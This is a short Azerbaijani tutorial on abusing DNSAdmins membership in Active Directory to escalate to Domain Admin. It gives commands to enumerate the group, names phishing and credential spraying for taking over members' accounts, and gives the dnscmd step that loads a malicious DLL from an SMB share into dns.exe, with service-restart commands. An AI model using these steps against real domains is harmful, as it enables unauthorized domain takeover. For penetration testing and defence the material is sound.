DNSAdmins Abuse

"DNSAdmins Abuse" termini Active Directory mühitində DNSAdmins qrupuna üzvlüyün sui-istifadəsi ilə bağlıdır. Windows Serverində daxili qrup olan DNSAdmins qrupu, Domain Name System (DNS) xidmətinin idarə edilməsi ilə bağlı müəyyən icazələr və hüquqlar verilən qrupdur.

Əgər istifadəçi DNSAdmins qrupunun üzvüdürsə, o, SYSTEM kimi işləyən dns.exe imtiyazları ilə ixtiyari DLL'ni (Dynamic Link Library) yükləyə bilər. DC DNS xidməti verərsə, istifadəçi öz imtiyazlarını DA'ə yüksəldə bilər. Bu prosesi həyata keçirmək üçün DNS xidmətini yenidən başlatmağa imkan verən səlahiyyətlərə ehtiyac var.

1.DNSAdmins qrupunun üzvlərini əldə etmək üçün:

PowerView:

Get-NetGroupMember -GroupName "DNSAdmins"

AD Modulu:

Get-ADGroupMember -Identiny DNSAdmins

2.İstifadəçilərdən sui-istifadə

DNSAdmins qrupunun üzvlərini müəyyən etdikdən sonra təcavüzkar, istifadəçinin etimadnamələrini pozmaq və ya onların hesabına giriş əldə etmək üçün müxtəlif üsullardan istifadə edə bilər. Bu üsullara, fişinq, credential spraying, zəifliklərdən istifadə və s. daxildir.

3.Zərərli DLL ilə Səlahiyyətlərin Yüksəldilməsi

DLL (Dynamic Link Library), eyni vaxtda bir neçə proqram tərəfindən istifadə edilə bilən funksiya və prosedurları saxlamaq üçün istifadə edilən fayl formatıdır. DLL'lər proqramlara kodu və resursları paylaşmağa imkan verir. SMB share'də zərərli DLL xidməti göstərməklə və dll istifadəsini konfiqurasiya etməklə səlahiyyət yüksəldilməsi hücumu həyata keçirə bilərik:

#dnscmd ilə SMB paylaşımında zərərli DLL xidmətinin aktiv edilməsi və zərərli DLL'dən istifadə etmək üçün DNS konfiqurasiyası:
dnscmd <NameOfDNSMAchine> /config /serverlevelplugindll \\Path\To\Our\Dll\malicious.dll

#DNS xidmətinin restart edilməsi:
sc \\DNSServer stop dns
sc \\DNSServer start dns